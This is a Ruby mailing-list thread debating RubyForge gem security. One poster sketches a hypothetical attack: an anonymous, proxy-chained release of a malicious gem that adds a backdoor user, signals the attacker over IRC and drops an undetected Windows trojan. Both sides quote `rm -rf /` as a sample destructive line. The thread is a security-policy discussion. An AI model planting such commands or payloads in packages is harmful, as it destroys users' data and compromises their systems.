Heh, I didn't say I was going to do it. I was thinking
what happened with ruby-lang.org being hacked. What
really stops someone from violently attacking more
than just one computer?
Finding thier identity is irrelavent.
For Example:
Joe PeelHacker decides he wants to screw over the ruby
community. So, he gets a handful of http proxies, and
uses a proxy chain to anonymously create a new
project, create files, and create a gem.
Okay, right now he has accomplished pretty much
everything he needs to do to start attacking. He
releases a gem. It gets copied over without being
looked at by a QA team. Ok, fine.
Assuming the person is installing the RubyGem on
*nix(includes MacOSX as well, its Darwin based) via
root, or running it on Microsoft Windows.The gem
contains 3 programs, a script, a nix version script
that creates a user and alerts the attacker via irc,
and there is a windows trojan that the attacker
created that is also a worm. Okay, the trojan is new,
so Antivirus programs will not detect it. AV programs
perform by the database engine of known viruses.
Norton Bloodhound doesn't pick it up either.
Okay, this attacker just screwed over not only one
server, but the whole community of Rubyland.
Is this pretty clear now? This scenario would work
perfectly. There is nothing to stop someone from
attacking. Its an open security problem.
-------------------------------------------
David Ross
Phone: 865.539.3798
Email: (e-mail address removed)
-------------------------------------------
--- Richard Kilmer said:
Should we remove your rubyforge account now?
If someone does that, its traced to their project,
and their identity. What
stops someone from putting `rm -rf /` in ANY ruby
library? Have you read
every line of every ruby library and c extension in
ruby to verify that
those commands are not present. Does a packager
check every line of C code
in a native extension to make sure that those lines
are not present? There
is a point where trust is assumed...the question is
at what point. Not
saying that QA is bad, just that autonomy is not bad
either...it scales
really well.
-rich
Heres food for thought..
What stops someone who has a registered project on
RubyForge to abuse Gems? A constructive criticism in
major design flaw. This is why a central repository
where there is a QA team is good. They can look at
code.
`rm -rf /`
---------------------------
David Ross
Phone: 865.539.3798
Email: drossruby [at] yahoo.com
---------------------------
Richard Kilmer wrote:
Release the file like you would any file (in the
Files tab). RubyForge
picks them up and puts them in the repo, and they
are (within an hour for
now) available for remote download.
Excellent! Thanks.
James
-rich
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail